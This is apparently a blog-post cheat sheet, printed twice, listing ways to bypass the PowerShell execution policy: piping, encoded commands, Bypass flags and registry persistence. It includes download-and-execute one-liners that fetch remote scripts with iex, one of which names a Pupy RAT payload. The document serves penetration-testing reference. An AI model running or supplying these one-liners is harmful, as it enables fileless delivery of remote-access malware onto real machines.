POLICY STATUS
PS C:> Get-ExecutionPolicy (Restricted/Bypass)
POLICY SCOPE
Get-ExecutionPolicy -List | Format-Table -AutoSize
BYPASS POLICY
1. COPY & PASTE
PS> write-host "string to execute"
CMD> Powershell -command "Write-Host 'My voice is my passport, verify me.'"
CMD> Powershell -c "Write-Host 'My voice is my passport, verify me.'"
2. ECHO SCRIPT
CMD> Echo Write-Host "powershell script" | PowerShell.exe -noprofile -
3. From FILE pipe to standard in
Get-Content .runme.ps1 | PowerShell.exe -noprofile -
or
TYPE .runme.ps1 | PowerShell.exe -noprofile -
4. ONLINER
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://bit.ly/1kEgbuH')"
Download Script from URL and Execute with Invoke Expression
This technique can be used to download a PowerShell script from the internet and execute it without having to write to disk. It also doesn’t result in any configuration changes.
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://192.168.43.221/pupy.ps1')"
5. ENCODED
$command = "Write-Host 'My voice is my passport, verify me.'" $bytes = [System.Text.Encoding]::Unicode.GetBytes($command) $encodedCommand = [Convert]::ToBase64String($bytes) powershell.exe -EncodedCommand $encodedCommand
AFTER ENCODING
powershell.exe -Enc VwByAGkAdABlAC0ASABvAHMAdAAgACcATQB5ACAAdgBvAGkAYwBlACAAaQBzACAAbQB5ACAAcABhAHMAcwBwAG8AcgB0ACwAIAB2AGUAcgBpAGYAeQAgAG0AZQAuACcA
6. INVOKE COMMAND
invoke-command -scriptblock {Write-Host "My voice is my passport, verify me."}
invoke-command -computername Server01 -scriptblock {get-executionpolicy} | set-executionpolicy -force
7. INVOKE EXPRESSION
Get-Content .runme.ps1 | Invoke-Expression OR GC .runme.ps1 | iex
RESTRICT /BYPASS EXECUTION-POLICY
RUN WITHOUT CONF CHANGE
PowerShell.exe -ExecutionPolicy Bypass -File .runme.ps1
FOR UNSIGNED SCRIPTS
PowerShell.exe -ExecutionPolicy UnRestricted -File .runme.ps1
SIGN IT http://www.darkoperator.com/blog/2013/3/5/powershell-basics-execution-policy-part-1.html
THEN USE
PowerShell.exe -ExecutionPolicy Remote-signed -File .runme.ps1
STATUS OF SCOPE
Set-ExecutionPolicy -Scope Process
FOR PROCESS (SESSION)
Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass
FOR USER PRSISTENT VIA REG KEY
Set-Executionpolicy -Scope CurrentUser -ExecutionPolicy UnRestricted
MODIFYING REG KEY (PERSISTENT)
HKEY_CURRENT_USER\Software\MicrosoftPowerShell\1\ShellIds\Microsoft.PowerShell
REF : https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/
PS C:> Get-ExecutionPolicy (Restricted/Bypass)
POLICY SCOPE
Get-ExecutionPolicy -List | Format-Table -AutoSize
BYPASS POLICY
1. COPY & PASTE
PS> write-host "string to execute"
CMD> Powershell -command "Write-Host 'My voice is my passport, verify me.'"
CMD> Powershell -c "Write-Host 'My voice is my passport, verify me.'"
2. ECHO SCRIPT
CMD> Echo Write-Host "powershell script" | PowerShell.exe -noprofile -
3. From FILE pipe to standard in
Get-Content .runme.ps1 | PowerShell.exe -noprofile -
or
TYPE .runme.ps1 | PowerShell.exe -noprofile -
4. ONLINER
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://bit.ly/1kEgbuH')"
Download Script from URL and Execute with Invoke Expression
This technique can be used to download a PowerShell script from the internet and execute it without having to write to disk. It also doesn’t result in any configuration changes.
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://192.168.43.221/pupy.ps1')"
5. ENCODED
$command = "Write-Host 'My voice is my passport, verify me.'" $bytes = [System.Text.Encoding]::Unicode.GetBytes($command) $encodedCommand = [Convert]::ToBase64String($bytes) powershell.exe -EncodedCommand $encodedCommand
AFTER ENCODING
powershell.exe -Enc VwByAGkAdABlAC0ASABvAHMAdAAgACcATQB5ACAAdgBvAGkAYwBlACAAaQBzACAAbQB5ACAAcABhAHMAcwBwAG8AcgB0ACwAIAB2AGUAcgBpAGYAeQAgAG0AZQAuACcA
6. INVOKE COMMAND
invoke-command -scriptblock {Write-Host "My voice is my passport, verify me."}
invoke-command -computername Server01 -scriptblock {get-executionpolicy} | set-executionpolicy -force
7. INVOKE EXPRESSION
Get-Content .runme.ps1 | Invoke-Expression OR GC .runme.ps1 | iex
RESTRICT /BYPASS EXECUTION-POLICY
RUN WITHOUT CONF CHANGE
PowerShell.exe -ExecutionPolicy Bypass -File .runme.ps1
FOR UNSIGNED SCRIPTS
PowerShell.exe -ExecutionPolicy UnRestricted -File .runme.ps1
SIGN IT http://www.darkoperator.com/blog/2013/3/5/powershell-basics-execution-policy-part-1.html
THEN USE
PowerShell.exe -ExecutionPolicy Remote-signed -File .runme.ps1
STATUS OF SCOPE
Set-ExecutionPolicy -Scope Process
FOR PROCESS (SESSION)
Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass
FOR USER PRSISTENT VIA REG KEY
Set-Executionpolicy -Scope CurrentUser -ExecutionPolicy UnRestricted
MODIFYING REG KEY (PERSISTENT)
HKEY_CURRENT_USER\Software\MicrosoftPowerShell\1\ShellIds\Microsoft.PowerShell
REF : https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/
No comments:
Post a Comment